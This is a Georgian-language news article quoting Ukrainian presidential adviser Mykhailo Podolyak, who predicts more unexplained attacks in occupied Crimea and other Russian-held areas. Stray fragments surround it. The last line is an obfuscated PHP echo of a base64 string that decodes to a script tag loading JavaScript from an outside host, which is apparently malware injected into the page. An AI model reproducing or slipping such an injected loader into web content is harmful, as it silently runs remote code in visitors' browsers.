celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის ადმინისტრაციაში აცხადებენ, რომ ოკუპირებული ყირიმის ტერიტორიაზე გაურკვეველი თავდასხმების რაოდენობა მხოლოდ გაიზრდება. უკრაინული მედიის ცნობით, აღნიშნულის შესახებ უკრაინის პრეზიდენტის ადმინისტრაციის ხელმძღვანელის მრჩეველმა, მიხაილ პოდოლიაკმა განაცხადა.
 
პოდოლიაკმა აღნიშნა, რომ ეს არის მაღალი ინტენსივობის ომი, ხოლო მაღალი ინტენსივობის ომი მხოლოდ ერთი მიმართულებით არ ხდება. მისი თქმით, რუს ოკუპანტებს ეგონათ, რომ შეიძლებოდა, შემოსულიყვნენ, მოქცეულიყვნენ დაუსჯელად და ხალხი დაესახიჩრებინათ, მაგრამ ომის ასეთი ინტენსივობით ყველაფერი მხოლოდ გაიზრდება.
 
„ვგულისხმობ, რომ უკურეაქცია გაიზრდება არა მხოლოდ ყირიმის ტერიტორიაზე, არამედ ყველა ოკუპირებულ ადგილზე, სადაც დღეს რუსული არმია იმყოფება“, – განაცხადა პოდოლიაკმა.
 
პოდოლიაკის თქმით, რუსი ოკუპანტები ფსიქოლოგიურად მოუმზადებლები იყვნენ იმისთვის, რაც დღეს ხდება ყირიმში ან ხერსონის, ზაპოროჟიეს, დონეცკის, ლუგანსკის რაიონებში.
 
„მათ ეგონათ, რომ დაუსჯელად მოგვკლავდნენ, თვითონ კი დასხდებოდნენ და დაელოდებოდნენ ამ ყველაფრის დასრულებას და მხოლოდ იმისთვის, რომ არ დაზარალებულიყვნენ. ყირიმში გაურკვეველი წარმოშობის თავდასხმების რიცხვი მხოლოდ გაიზრდება, რაც გააფუჭებს არა მხოლოდ კონკრეტულ სეზონს, არამედ გააფუჭებს მოპარულ ტერიტორიაზე ცხოვრების შესაძლებლობას“, – აღნიშნა პოდოლიაკმა.
527
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");